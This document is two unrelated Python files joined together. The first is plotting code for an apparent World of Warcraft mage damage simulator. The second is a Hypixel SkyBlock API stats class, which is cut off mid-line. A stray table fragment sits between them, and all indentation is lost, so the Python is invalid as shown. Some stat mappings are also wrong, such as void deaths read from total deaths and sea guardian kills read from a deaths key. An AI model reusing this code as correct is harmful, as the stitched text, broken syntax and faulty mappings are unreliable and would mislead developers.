IV_replace = bck.get_dps_mps_rotation([spells[x] for x in ['frostbolt_13']])
dmg, dmg_burn, dmg_save, dmg_other, time_shift = bck.optimize_cycles_return_damage(new_stats,times,new_talents, burn_rot, save_rot, return_fractions=True, IV_replace=IV_replace )
return dmg, dmg_burn, dmg_save, dmg_other, time_shift
def plot_dps(ui, mage, buffs, i, linestyle, ax, misc, fractions = False, DMG = False):
times = np.arange(ui['time_min'],ui['time_max']+1, 1)
dmg, dmg_burn, dmg_save, dmg_other, time_shift = get_dmg(mage, buffs, times)
if DMG:
times_mod = 1
ax.set_ylabel('Damage [DMG]')
#ax.set_ylim([u,ui['dps_max']])
else:
times_mod = times
ax.set_ylabel('Average dps [DMG/s]')
ax.set_ylim([ui['dps_min'],ui['dps_max']])
if fractions:
if not 'dmg_frac_label' in misc:
misc.append('dmg_frac_label')
ax.fill_between(times,
np.zeros(len(times)),
dmg_save/times_mod,
color=[0.5,0,1,0.2], label = 'save')
ax.fill_between(times,
dmg_save/times_mod,
dmg_save/times_mod+dmg_burn/times_mod,
color=[1,0,0.5,0.2], label = 'burn')
else:
ax.fill_between(times,
np.zeros(len(times)),
dmg_save/times_mod,
color=[0.5,0,1,0.2])
ax.fill_between(times,
dmg_save/times_mod,
dmg_save/times_mod+dmg_burn/times_mod,
color=[1,0,0.5,0.2])
if np.sum(dmg_other)>1000:
if not 'dmg_frac_other_label' in misc:
misc.append('dmg_frac_other_label')
ax.fill_between(times,
dmg_save/times_mod+dmg_burn/times_mod,
dmg_save/times_mod+dmg_burn/times_mod+dmg_other/times_mod,
color=[0,0,0,0.2], label = 'other (pom+pyro, etc)')
else:
ax.fill_between(times,
dmg_save/times_mod+dmg_burn/times_mod,
dmg_save/times_mod+dmg_burn/times_mod+dmg_other/times_mod,
color=[0,0,0,0.2])
ax.plot(times, dmg/times_mod, linestyle= linestyle, color=mage.color, label = mage.label+', '+ui['buff_case_'+str(i)+'_label'])
ax.set_xticks(ticks=np.arange((int((times[0]-1)/30)+1)*30,times[-1]+1,30))
ax.set_xlabel('Total casting time before boss dead [s]')
'''ax.annotate('Evocation', xy=(43, 1100),
xytext=(48, 1400),
arrowprops=dict(facecolor='black', shrink=0.05),
horizontalalignment='left', verticalalignment='top',
)
ax.annotate('OOM', xy=(110, 800),
xytext=(120,1100),
arrowprops=dict(facecolor='black', shrink=0.05),
horizontalalignment='left', verticalalignment='top',
)'''
ax.legend()
ax.set_xlim([ui['time_min'],ui['time_max']])
ylim = ax.get_ylim()
if ylim[0]<0:
ax.set_ylim([0,ylim[1]])
#fig.savefig('optimized_spam.png')
return misc
def plot_spell_dps(ui, mages, buff_cases, linestyles, ax, DPM = False):
#ax.grid()
spell_names = ['frostbolt_13','fireball_13_one_tick',
'scorch_9',
'arcane_blast_1_0speed_0mana',
'arcane_blast_1_1speed_1mana',
'arcane_blast_1_2speed_2mana',
'arcane_blast_1_3speed_3mana',
'arcane_blast_1_3speed_0mana',
'arcane_missiles_10',
]
x = np.arange(len(spell_names))
tot_cases = 0
for i, buff_case in enumerate(buff_cases):
if buff_case['check'] == 1:
tot_cases+=len(mages)
j=0
width = 0.8/(tot_cases)
for i, buff_case in enumerate(buff_cases):
linestyle = linestyles[i]
if buff_case['check'] == 1:
for mage in mages:
new_stats_0 = copy.deepcopy(mage.stats)
new_talents = copy.deepcopy(mage.talents)
bck.buff_me(new_stats_0, new_talents, buff_case)
spells, new_stats = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
dpms = []
dpss = []
for spell_name in spell_names:
dps = spells[spell_name].average_damage / spells[spell_name].actual_cast_time
dpss.append(dps)
dpm = spells[spell_name].average_damage / spells[spell_name].actual_mana
dpms.append(dpm)
offset = -0.8/2+(j+0.5)*0.8/(tot_cases)
color = [mage.color[0], mage.color[1], mage.color[2],0.5]
edgecolor = [mage.color[0], mage.color[1], mage.color[2],1]
if not DPM:
rects = ax.bar(x +offset, dpss, width, linestyle=linestyle, edgecolor= edgecolor, color=color, label=mage.label)
else:
rects = ax.bar(x +offset, dpms, width, linestyle=linestyle, edgecolor= edgecolor, color=color, label=mage.label)
#rects = ax[1].bar(x +offset, dpms, width, color=mage.color, label=mage.label)
j+=1
if not DPM:
ax.set_ylabel('spell dps')
else:
ax.set_ylabel('spell dpm')
#ax.set_ylabel('spell dpm')
spell_names_short = ['Frostbolt',
'Fireball',
'Scorch',
'AB0',
'AB1',
'AB2',
'AB3',
'AB3\ncost1',
'AM',
]
ax.set_xticks(np.arange(0,len(spell_names_short),1))
ax.set_xticklabels(spell_names_short)
#ax[1].legend()
#fig.tight_layout()
return
def plot_stat_weights(ui, mages, buff_cases, linestyles, ax, DPM = False):
stats_list = ['intellect','common_spell_damage',
'crit_rating','hit_rating','haste_rating','mp5','spirit']
stats_names = ['Intellect','+Spelldamage','Crit rating',
'Hit rating','Haste','mp5','Spirit']
x_step = ui['time_max']-ui['time_min']
xlim = [ui['time_min'],ui['time_max']+3*x_step]
times = np.arange(ui['time_min'],ui['time_max']+1, 1)
max_ylim = ui['stat_weight_ymax']
for i, buff_case in enumerate(buff_cases):
linestyle = linestyles[i]
if buff_case['check'] == 1:
for mage in mages:
tmp = get_dmg(mage, buff_case, times)
dps_0 = tmp[0]/times
xo=-x_step
yo=max_ylim
for i, stat in enumerate(stats_list):
if i==4:
xo=0
yo-=max_ylim
else:
xo+=x_step
mage.stats[stat]-=10
#print('arcane')
out = get_dmg(mage, buff_case, times)
dps_new = out[0]/times
mage.stats[stat]+=10
fraction_increase_per_stat = -0.1*(dps_new/dps_0-1)
#stat_per_percent_fire[stat_per_percent_fire<0]=np.nan
#stat_per_percent_fire[stat_per_percent_fire>max_ylim]=np.nan
stat_per_percent = 0.01/fraction_increase_per_stat
y= 20/stat_per_percent
y[y<-0.0001] = np.nan
y[y>max_ylim] = np.nan
ax.plot(times+xo,y+yo,linestyle= linestyle,color=mage.color)
xo=-x_step
yo=max_ylim
for i, stat in enumerate(stats_list):
if i==4:
xo=0
yo-=max_ylim
else:
xo+=x_step
ax.text(xo+xlim[0]+0.05*x_step, yo+max_ylim-0.05*max_ylim, stats_names[i],ha='left', va='top')
ax.set_xlim(xlim)
ax.set_ylim([0,2*max_ylim])
ax.set_xticks([])
ax.set_yticks(np.arange(max_ylim*4)/2)
ax.set_yticklabels(np.arange(max_ylim*4)/2%max_ylim)
ax.plot(xlim, [max_ylim,max_ylim], lw=0.5,color=[0,0,0,1])
ax.grid()
for i in range(1,4):
ax.plot([xlim[0]+x_step*i]*2, [0,max_ylim*2], lw=0.5,color=[0,0,0,1])
x_ticks_0 = np.arange((int((times[0]-1)/30)+1)*30,times[-1],30)
x_ticks = []
for i in range(4):
for x in x_ticks_0:
x_ticks.append(x+i*x_step)
ax.set_xticks(ticks=x_ticks)
x_ticks = []
for i in range(4):
for x in x_ticks_0:
x_ticks.append(int(x))
ax.set_xticklabels(x_ticks)
ax.set_xlabel('Total casting time before boss dead [s]')
ax.set_ylabel('Stat weight [-]')
'''axes[i].set_title(stats_names[i])
axes[i].set_ylim([0,max_ylim])
axes[i].set_yticks([0,1,2,3,4,5])
axes[i].grid()
axes[i].set_xlim([20,180])'''
#axes[-1].set_axis_off()
#fig.suptitle('Stat weights')
#fig.tight_layout()
def plot_compare_buff_states(ui, mages, buff_cases, linestyles, ax):
xlim = [ui['time_min'],ui['time_max']]
times = np.arange(ui['time_min'],ui['time_max']+1, 1)
max_ylim = ui['stat_weight_ymax']
ax.plot(times, np.zeros(times.shape), color=[0,0,0,1])
for mage in mages:
done_first = 0
for i, buff_case in enumerate(buff_cases):
linestyle = linestyles[i]
if buff_case['check'] == 1:
if done_first ==0:
tmp = get_dmg(mage, buff_case, times)
dps_0 = tmp[0]/times
done_first = 1
label_0 = ui['buff_case_'+str(i)+'_label']
else:
tmp = get_dmg(mage, buff_case, times)
dps_1 = tmp[0]/times
ax.plot(times, 100*(dps_1/dps_0-1), linestyle= linestyle, color=mage.color,
label = mage.label+', '+ui['buff_case_'+str(i)+'_label'])
ax.set_xticks(ticks=np.arange((int((times[0]-1)/30)+1)*30,times[-1]+1,30))
ax.set_xlabel('Total casting time before boss dead [s]')
ax.set_ylabel('% damage increase vs '+label_0)
ax.legend()
ax.set_xlim([ui['time_min'],ui['time_max']])
ax.grid()
def set_default_mage(event):
frame = event.widget
while not hasattr(frame,'nav'):
frame = frame.master
frame.nav.clear_color('color3')
frame.nav.color_selected('color3')
mages = frame.nav.get_paths_of_selected_items()
if len(mages)>0:
frame.default_mage = frame.nav.get_paths_of_selected_items()[0]
print('set default_mage:',frame.default_mage )
else:
delattr(frame,'default_mage')
print('cleared default_mage' )
frame.nav.deselect()
def plot_compare_mages(ui, default_mage, mages, buff_cases, linestyles, ax):
xlim = [ui['time_min'],ui['time_max']]
times = np.arange(ui['time_min'],ui['time_max']+1, 1)
max_ylim = ui['stat_weight_ymax']
ax.plot(times, np.zeros(times.shape), color=default_mage.color)
for i, buff_case in enumerate(buff_cases):
linestyle = linestyles[i]
if buff_case['check'] == 1:
tmp = get_dmg(default_mage, buff_case, times)
dps_0 = tmp[0]/times
for mage in mages:
if mage.location == default_mage.location:
continue
tmp = get_dmg(mage, buff_case, times)
dps_1 = tmp[0]/times
ax.plot(times, 100*(dps_1/dps_0-1), linestyle= linestyle, color=mage.color,
label = mage.label+', '+ui['buff_case_'+str(i)+'_label'])
ax.set_xticks(ticks=np.arange((int((times[0]-1)/30)+1)*30,times[-1]+1,30))
ax.grid()
ax.set_xlabel('Total casting time before boss dead [s]')
ax.set_ylabel('% damage increase vs '+default_mage.label)
ax.legend()
ax.set_xlim([ui['time_min'],ui['time_max']])
| 35,706 | 17,028 |
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2021 plun1331
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import datetime
from .utils import SkyBlockUtils
types = {'zombie': SkyBlockUtils.zombieSlayer,
'spider': SkyBlockUtils.spiderSlayer,
'wolf': SkyBlockUtils.wolfSlayer}
class SkyBlockStats(object):
r"""Represents a player's SkyBlock Statistics.
:param stats: The player's stats from their memberdata retrieved from the API.
:type stats: dict"""
def __init__(self, stats: dict):
self.top_crit_damage = stats['highest_crit_damage'] if 'highest_crit_damage' in stats else None
self.kills = int(stats['kills']) if 'kills' in stats else None
self.zombie_kills = int(stats['kills_zombie']) if 'kills_zombie' in stats else None
self.bids = int(stats['auctions_bids']) if 'auctions_bids' in stats else None
self.highest_bid = stats['auctions_highest_bid'] if 'auctions_highest_bid' in stats else None
self.zombie_villager_kills = int(stats['kills_zombie_villager']) if 'kills_zombie_villager' in stats else None
self.skeleton_kills = int(stats['kills_skeleton']) if 'kills_skeleton' in stats else None
self.spider_kills = int(stats['kills_spider']) if 'kills_spider' in stats else None
self.enderman_kills = int(stats['kills_enderman']) if 'kills_enderman' in stats else None
self.deaths = int(stats['deaths']) if 'deaths' in stats else None
self.zombie_deaths = int(stats['deaths_zombie']) if 'deaths_zombie' in stats else None
self.void_deaths = int(stats['deaths']) if 'deaths' in stats else None
self.skeleton_deaths = int(stats['deaths_skeleton']) if 'deaths_skeleton' in stats else None
self.fire_deaths = int(stats['deaths_fire']) if 'deaths_fire' in stats else None
self.auctions_won = int(stats['auctions_won']) if 'auctions_won' in stats else None
self.uncommon_auctions_bought = int(
stats['auctions_bought_uncommon']) if 'auctions_bought_uncommon' in stats else None
self.auctions_gold_spent = int(stats['auctions_gold_spent']) if 'auctions_gold_spent' in stats else None
self.auctions_created = int(stats['auctions_created']) if 'auctions_created' in stats else None
self.auction_fees_spent = int(stats['auctions_fees']) if 'auctions_fees' in stats else None
self.player_deaths = int(stats['deaths_player']) if 'deaths_player' in stats else None
self.auctions_completed = int(stats['auctions_completed']) if 'auctions_completed' in stats else None
self.uncommon_auctions_sold = int(
stats['auctions_sold_uncommon']) if 'auctions_sold_uncommon' in stats else None
self.auction_gold_earned = int(stats['auctions_gold_earned']) if 'auctions_gold_earned' in stats else None
self.invisible_creeper_kills = int(
stats['kills_invisible_creeper']) if 'kills_invisible_creeper' in stats else None
self.emerald_slime_kills = int(stats['kills_emerald_slime']) if 'kills_emerald_slime' in stats else None
self.diamond_zombie_kills = int(stats['kills_diamond_zombie']) if 'kills_diamond_zombie' in stats else None
self.diamond_skeleton_deaths = int(
stats['deaths_diamond_skeleton']) if 'deaths_diamond_skeleton' in stats else None
self.diamond_zombie_deaths = int(stats['deaths_diamond_zombie']) if 'deaths_diamond_zombie' in stats else None
self.diamond_skeleton_kills = int(
stats['kills_diamond_skeleton']) if 'kills_diamond_skeleton' in stats else None
self.lapis_zombie_kills = int(stats['kills_lapis_zombie']) if 'kills_lapis_zombie' in stats else None
self.emerald_slime_deaths = int(stats['deaths_emerald_slime']) if 'deaths_emerald_slime' in stats else None
self.redstone_pigman_kills = int(stats['kills_redstone_pigman']) if 'kills_redstone_pigman' in stats else None
self.redstone_pigman_deaths = int(
stats['deaths_redstone_pigman']) if 'deaths_redstone_pigman' in stats else None
self.splitter_spider_silverfish_kills = int(
stats['kills_splitter_spider_silverfish']) if 'kills_splitter_spider_silverfish' in stats else None
self.jockey_shot_silverfish_kills = int(
stats['kills_jockey_shot_silverfish']) if 'kills_jockey_shot_silverfish' in stats else None
self.wither_skeleton_kills = int(stats['kills_wither_skeleton']) if 'kills_wither_skeleton' in stats else None
self.magma_cube_kills = int(stats['kills_magma_cube']) if 'kills_magma_cube' in stats else None
self.magma_cube_fireball_kills = int(
stats['kills_fireball_magma_cube']) if 'kills_fireball_magma_cube' in stats else None
self.cow_kills = int(stats['kills_cow']) if 'kills_cow' in stats else None
self.pig_kills = int(stats['kills_pig']) if 'kills_pig' in stats else None
self.items_fished = int(stats['items_fished']) if 'items_fished' in stats else None
self.normal_items_fished = int(stats['items_fished_normal']) if 'items_fished_normal' in stats else None
self.treasure_items_fished = int(stats['items_fished_treasure']) if 'items_fished_treasure' in stats else None
self.common_auctions_bought = int(
stats['auctions_bought_common']) if 'auctions_bought_common' in stats else None
self.witch_kills = int(stats['kills_witch']) if 'kills_witch' in stats else None
self.spider_deaths = int(stats['deaths_spider']) if 'deaths_spider' in stats else None
self.epic_auctions_bought = int(stats['auctions_bought_epic']) if 'auctions_bought_epic' in stats else None
self.magma_cube_fireball_deaths = int(
stats['deaths_fireball_magma_cube']) if 'deaths_fireball_magma_cube' in stats else None
self.weaver_spider_kills = int(stats['kills_weaver_spider']) if 'kills_weaver_spider' in stats else None
self.splitter_spider_kills = int(stats['kills_splitter_spider']) if 'kills_splitter_spider' in stats else None
self.jockey_skeleton_kills = int(stats['kills_jockey_skeleton']) if 'kills_jockey_skeleton' in stats else None
self.spider_jockey_kills = int(stats['kills_spider_jockey']) if 'kills_spider_jockey' in stats else None
self.dasher_spider_kills = int(stats['kills_dasher_spider']) if 'kills_dasher_spider' in stats else None
self.spider_jockey_deaths = int(stats['deaths_spider_jockey']) if 'deaths_spider_jockey' in stats else None
self.dasher_spider_deaths = int(stats['deaths_dasher_spider']) if 'deaths_dasher_spider' in stats else None
self.jockey_shot_silverfish_deaths = int(
stats['deaths_jockey_shot_silverfish']) if 'deaths_jockey_shot_silverfish' in stats else None
self.splitter_spider_deaths = int(
stats['deaths_splitter_spider']) if 'deaths_splitter_spider' in stats else None
self.common_auctions_sold = int(stats['auctions_sold_common']) if 'auctions_sold_common' in stats else None
self.no_bid_auctions = int(stats['auctions_no_bids']) if 'auctions_no_bids' in stats else None
self.ghast_kills = int(stats['kills_ghast']) if 'kills_ghast' in stats else None
self.rare_auctions_sold = int(stats['auctions_sold_rare']) if 'auctions_sold_rare' in stats else None
self.epic_auctions_sold = int(stats['auctions_sold_epic']) if 'auctions_sold_epic' in stats else None
self.magma_cube_boss_deaths = int(
stats['deaths_magma_cube_boss']) if 'deaths_magma_cube_boss' in stats else None
self.blaze_kills = int(stats['kills_blaze']) if 'kills_blaze' in stats else None
self.wither_skeleton_deaths = int(
stats['deaths_wither_skeleton']) if 'deaths_wither_skeleton' in stats else None
self.magma_cube_deaths = int(stats['deaths_magma_cube']) if 'deaths_magma_cube' in stats else None
self.respawning_skeleton_kills = int(
stats['kills_respawning_skeleton']) if 'kills_respawning_skeleton' in stats else None
self.fall_deaths = int(stats['deaths_fall']) if 'deaths_fall' in stats else None
self.rare_auctions_bought = int(stats['auctions_bought_rare']) if 'auctions_bought_rare' in stats else None
self.rabbit_kills = int(stats['kills_rabbit']) if 'kills_rabbit' in stats else None
self.sheep_kills = int(stats['kills_sheep']) if 'kills_sheep' in stats else None
self.pigman_kills = int(stats['kills_pigman']) if 'kills_pigman' in stats else None
self.player_kills = int(stats['kills_player']) if 'kills_player' in stats else None
self.ruin_wolf_kills = int(stats['kills_ruin_wolf']) if 'kills_ruin_wolf' in stats else None
self.night_respawning_skeleton_kills = int(
stats['kills_night_respawining_skeleton']) if 'kills_night_respawining_skeleton' in stats else None
self.legendary_auctions_bought = int(
stats['auctions_bought_legendary']) if 'auctions_bought_legendary' in stats else None
self.chicken_kills = int(stats['kills_chicken']) if 'kills_chicken' in stats else None
self.respawning_skeleton_deaths = int(
stats['deaths_respawning_skeleton']) if 'deaths_respawning_skeleton' in stats else None
self.ruin_wolf_deaths = int(stats['deaths_ruin_wolf']) if 'deaths_ruin_wolf' in stats else None
self.unburried_zombie_deaths = int(
stats['deaths_unburied_zombie']) if 'deaths_unburied_zombie' in stats else None
self.unburried_zombie_kills = int(
stats['kills_unburried_zombie']) if 'kills_unburried_zombie' in stats else None
self.enderman_deaths = int(stats['deaths_enderman']) if 'deaths_enderman' in stats else None
self.endermite_deaths = int(stats['deaths_endermite']) if 'deaths_endermite' in stats else None
self.endermite_kills = int(stats['kills_endermite']) if 'kills_endermite' in stats else None
self.zealot_enderman_deaths = int(
stats['deaths_zealot_enderman']) if 'deaths_zealot_enderman' in stats else None
self.wise_dragon_deaths = int(stats['deaths_wise_dragon']) if 'deaths_wise_dragon' in stats else None
self.watcher_deaths = int(stats['deaths_watcher']) if 'deaths_watcher' in stats else None
self.watcher_kills = int(stats['kills_watcher']) if 'kills_watcher' in stats else None
self.random_slime_kills = int(stats['kills_random_slime']) if 'kills_random_slime' in stats else None
self.voracious_spider_kills = int(
stats['kills_voracious_spider']) if 'kills_voracious_spider' in stats else None
self.wolf_deaths = int(stats['deaths_wolf']) if 'deaths_wolf' in stats else None
self.old_wolf_kills = int(stats['kills_old_wolf']) if 'kills_old_wolf' in stats else None
self.olf_wolf_deaths = int(stats['deaths_old_wolf']) if 'deaths_old_wolf' in stats else None
self.zealot_enderman_kills = int(stats['kills_zealot_enderman']) if 'kills_zealot_enderman' in stats else None
self.obsidian_wither_kills = int(stats['kills_obsidian_wither']) if 'kills_obsidian_wither' in stats else None
self.howling_spirit_kills = int(stats['kills_howling_spirit']) if 'kills_howling_spirit' in stats else None
self.howling_spirit_deaths = int(stats['deaths_howling_spirit']) if 'deaths_howling_spirit' in stats else None
self.unknown_deaths = int(stats['deaths_unknown']) if 'deaths_unknown' in stats else None
self.sea_walker_kills = int(stats['kills_sea_walker']) if 'kills_sea_walker' in stats else None
self.pond_squid_kills = int(stats['kills_pond_squid']) if 'kills_pond_squid' in stats else None
self.sea_guardian_kills = int(stats['deaths_sea_guardian']) if 'deaths_sea_guardian' in stats else None
self.sea_archer_kills = int(stats['kills_sea_archer']) if 'kills_sea_archer' in stats else None
self.young_dragon_deaths = int(stats['deaths_young_dragon']) if 'deaths_young_dragon' in stats else None
self.zombie_deep_kills = int(stats['kills_zombie_deep']) if 'kills_zombie_deep' in stats else None
self.gifts_given = int(stats['gifts_given']) if 'gifts_given' in stats else None
self.gifts_recieved = int(stats['gifts_recieved']) if 'gifts_recieved' in stats else None
self.frozen_steve_deaths = int(stats['deaths_frozen_steve']) if 'deaths_frozen_steve' in stats else None
self.brood_mother_spider_kills = int(
stats['kills_brood_mother_spider']) if 'kills_brood_mother_spider' in stats else None
self.brood_mother_cave_spider_kills = int(
stats['kills_brood_mother_cave_spider']) if 'kills_brood_mother_cave_spider' in stats else None
self.foraging_race_best_time = int(
stats['foraging_race_best_time']) if 'foraging_race_best_time' in stats else None
self.legendary_auctions_sold = int(
stats['auctions_sold_legendary']) if 'auctions_sold_legendary' in stats else None
self.special_auctions_sold = int(stats['auctions_sold_special']) if 'auctions_sold_special' in stats else None
self.generator_magma_cube_kills = int(
stats['kills_generator_magma_cube']) if 'kills_generator_magma_cube' in stats else None
self.bat_pinata_kills = int(stats['kills_bat_pinata']) if 'kills_bat_pinata' in stats else None
self.special_auctions_bought = int(
stats['auctions_bought_special']) if 'auctions_bought_special' in stats else None
self.horseman_zombie_kills = int(stats['kills_horseman_zombie']) if 'kills_horseman_zombie' in stats else None
self.old_dragon_deaths = int(stats['deaths_old_dragon']) if 'deaths_old_dragon' in stats else None
self.liquid_hot_magma_deaths = int(
stats['deaths_liquid_hot_magma']) if 'deaths_liquid_hot_magma' in stats else None
self.liquid_hot_magma_kills = int(
stats['kills_liquid_hot_magma']) if 'kills_liquid_hot_magma' in stats else None
self.most_winter_snowballs_hit = int(
stats['most_winter_snowballs_hit']) if 'most_winter_snowballs_hit' in stats else None
self.most_winter_damage_dealt = int(
stats['most_winter_damage_dealt']) if 'most_winter_damage_dealt' in stats else None
self.most_winter_magma_damage_dealt = int(
stats['most_winter_magma_damage_dealt']) if 'most_winter_magma_damage_dealt' in stats else None
self.ender_crystals_destroyed = int(
stats['ender_crystals_destroyed']) if 'ender_crystals_destroyed' in stats else None
self.most_winter_cannonballs_hit = int(
stats['most_winter_cannonballs_hit']) if 'most_winter_cannonballs_hit' in stats else None
self.slime_kills = int(stats['kills_slime']) if 'kills_slime' in stats else None
self.unstable_dragon_deaths = int(
stats['deaths_unstable_dragon']) if 'deaths_unstable_dragon' in stats else None
self.superior_dragon_deaths = int(
stats['deaths_superior_dragon']) if 'deaths_superior_dragon' in stats else None
self.forest_island_bat_kills = int(
stats['kills_forest_island_bat']) if 'kills_forest_island_bat' in stats else None
self.strong_dragon_deaths = int(stats['deaths_strong_dragon']) if 'deaths_strong_dragon' in stats else None
self.pet_milestone_ores_mined = int(
stats['pet_milestone_ores_mined']) if 'pet_milestone_ores_mined' in stats else None
self.pet_milestone_sea_creatures_killed = int(
stats['pet_milestone_sea_creatures_killed']) if 'pet_milestone_sea_creatures_killed' in stats else None
self.chicken_deep_kills = int(stats['kills_chicken_deep']) if 'kills_chicken_deep' in stats else None
self.corrupted_protector_deaths = int(
stats['deaths_corrupted_protector']) if 'deaths_corrupted_protector' in stats else None
self.pack_spirit_kills = int(stats['kills_pack_spirit']) if 'kills_pack_spirit' in stats else None
self.soul_of_the_alpha_kills = int(
stats['kills_soul_of_the_alpha']) if 'kills_soul_of_the_alpha' in stats else None
self.frosty_the_snowman_kills = int(
stats['kills_frosty_the_snowman']) if 'kills_frosty_the_snowman' in stats else None
self.frozen_steve_kills = int(stats['kills_frozen_steve']) if 'kills_frozen_steve' in stats else None
self.catfish_kills = int(stats['kills_catfish']) if 'kills_catfish' in stats else None
self.dungeon_hub_crystal_core_anything_no_return_best_time = stats[
'dungeon_hub_crystal_core_anything_no_return_best_time'
] if 'dungeon_hub_crystal_core_anything_no_return_best_time' in stats else None
self.dungeon_hub_giant_mushroom_anything_no_return_best_time = stats[
'dungeon_hub_giant_mushroom_anything_no_return_best_time'
] if 'dungeon_hub_giant_mushroom_anything_no_return_best_time' in stats else None
self.dungeon_hub_giant_mushroom_no_pearls_no_return_best_time = stats[
'dungeon_hub_giant_mushroom_no_pearls_no_return_best_time'
] if 'dungeon_hub_giant_mushroom_no_pearls_no_return_best_time' in stats else None
self.dungeon_hub_precursor_ruins_anything_no_return_best_time = stats[
'dungeon_hub_precursor_ruins_anything_no_return_best_time'
] if 'dungeon_hub_precursor_ruins_anything_no_return_best_time' in stats else None
self.dungeon_hub_precursor_ruins_nothing_no_return_best_time = stats[
'dungeon_hub_precursor_ruins_nothing_no_return_best_time'
] if 'dungeon_hub_precursor_ruins_nothing_no_return_best_time' in stats else None
self.dungeon_hub_precursor_ruins_no_pearls_no_return_best_time = stats[
'dungeon_hub_precursor_ruins_no_pearls_no_return_best_time'
] if 'dungeon_hub_precursor_ruins_no_pearls_no_return_best_time' in stats else None
self.crypt_lurker_kills = int(stats['kills_crypt_lurker']) if 'kills_crypt_lurker' in stats else None
self.dungeon_respawning_skeleton_kills = int(
stats['kills_dungeon_respawning_skeleton']) if 'kills_dungeon_respawning_skeleton' in stats else None
self.scared_skeleton_kills = int(stats['kills_scared_skeleton']) if 'kills_scared_skeleton' in stats else None
self.skeleton_grunt_kills = int(stats['kills_skeleton_grunt']) if 'kills_skeleton_grunt' in stats else None
self.crypt_dreadlord_kills = int(stats['kills_scared_skeleton']) if 'kills_scared_skeleton' in stats else None
self.crypt_souleater_kills = int(stats['kills_crypt_souleater']) if 'kills_crypt_souleater' in stats else None
self.crypt_tank_zombie_kills = int(
stats['kills_crypt_tank_zombie']) if 'kills_crypt_tank_zombie' in stats else None
self.diamond_guy_kills = int(stats['kills_diamond_guy']) if 'kills_diamond_guy' in stats else None
self.zombie_grunt_kills = int(stats['kills_zombie_grunt']) if 'kills_zombie_grunt' in stats else None
self.crypt_lurker_deaths = int(stats['deaths_crypt_lurker']) if 'deaths_crypt_lurker' in stats else None
self.lost_adventurer_deaths = int(
stats['deaths_lost_adventurer']) if 'deaths_lost_adventurer' in stats else None
self.watcher_summon_undead_kills = int(
stats['kills_watcher_summon_undead']) if 'kills_watcher_summon_undead' in stats else None
self.skeleton_soldier_kills = int(
stats['kills_skeleton_soldier']) if 'kills_skeleton_soldier' in stats else None
self.diamond_guy_deaths = int(stats['deaths_diamond_guy']) if 'deaths_diamond_guy' in stats else None
self.watcher_summon_undead_deaths = int(
stats['deaths_watcher_summon_undead']) if 'deaths_watcher_summon_undead' in stats else None
self.bonzo_summon_undead_kills = int(
stats['kills_bonzo_summon_undead']) if 'kills_bonzo_summon_undead' in stats else None
self.lost_adventurer_kills = int(stats['kills_lost_adventurer']) if 'kills_lost_adventurer' in stats else None
self.skeleton_master_kills = int(stats['kills_skeleton_master']) if 'kills_skeleton_master' in stats else None
self.sniper_skeleton_kills = int(stats['kills_sniper_skeleton']) if 'kills_sniper_skeleton' in stats else None
self.skeleton_soldier_deaths = int(
stats['deaths_skeleton_soldier']) if 'deaths_skeleton_soldier' in stats else None
self.trap_deaths = int(stats['deaths_trap']) if 'deaths_trap' in stats else None
self.crypt_undead_kills = int(stats['kills_crypt_undead']) if 'kills_crypt_undead' in stats else None
self.skeleton_grunt_deaths = int(stats['deaths_skeleton_grunt']) if 'deaths_skeleton_grunt' in stats else None
self.scarf_warrior_deaths = int(stats['deaths_scarf_warrior']) if 'deaths_scarf_warrior' in stats else None
self.skeleton_master_deaths = int(
stats['deaths_skeleton_master']) if 'deaths_skeleton_master' in stats else None
self.blaze_higher_or_lower_kills = int(
stats['kills_blaze_higher_or_lower']) if 'kills_blaze_higher_or_lower' in stats else None
self.dungeon_respawning_skeleton_deaths = int(
stats['deaths_dungeon_respawning_skeleton']) if 'deaths_dungeon_respawning_skeleton' in stats else None
self.scarf_deaths = int(stats['deaths_scarf']) if 'deaths_scarf' in stats else None
self.bonzo_summon_undead_deaths = int(
stats['deaths_bonzo_summon_undead']) if 'deaths_bonzo_summon_undead' in stats else None
self.bonzo_deaths = int(stats['deaths_bonzo']) if 'deaths_bonzo' in stats else None
self.lonely_spider_kills = int(stats['kills_lonely_spider']) if 'kills_lonely_spider' in stats else None
self.parasite_kills = int(stats['kills_parasite']) if 'kills_parasite' in stats else None
self.cellar_spider_kills = int(stats['kills_cellar_spiders']) if 'kills_cellar_spiders' in stats else None
self.dungeon_secret_bat_kills = int(
stats['kills_dungeon_secret_bat']) if 'kills_dungeon_secret_bat' in stats else None
self.scarf_mage_kills = int(stats['kills_scarf_mage']) if 'kills_scarf_mage' in stats else None
self.crypt_undead_friedrich_kills = int(
stats['kills_crypt_undead_friedrich']) if 'kills_crypt_undead_friedrich' in stats else None
self.guardian_defender_kills = int(
stats['kills_guardian_defender']) if 'kills_guardian_defender' in stats else None
self.crypt_dreadlord_deaths = int(
stats['deaths_crypt_dreadlord']) if 'deaths_crypt_dreadlord' in stats else None
self.zombie_soldier_kills = int(stats['kills_zombie_soldier']) if 'kills_zombie_soldier' in stats else None
self.skeletor_deaths = int(stats['deaths_skeletor']) if 'deaths_skeletor' in stats else None
self.skeletor_kills = int(stats['kills_skeletor']) if 'kills_skeletor' in stats else None
self.professer_mage_guardian_deaths = int(
stats['deaths_professor_mage_guardian']) if 'deaths_professor_mage_guardian' in stats else None
self.sea_leech_kills = int(stats['kills_sea_leech']) if 'kills_sea_leech' in stats else None
self.sea_witch_kills = int(stats['kills_sea_witch']) if 'kills_sea_witch' in stats else None
self.skeleton_emperor_kills = int(
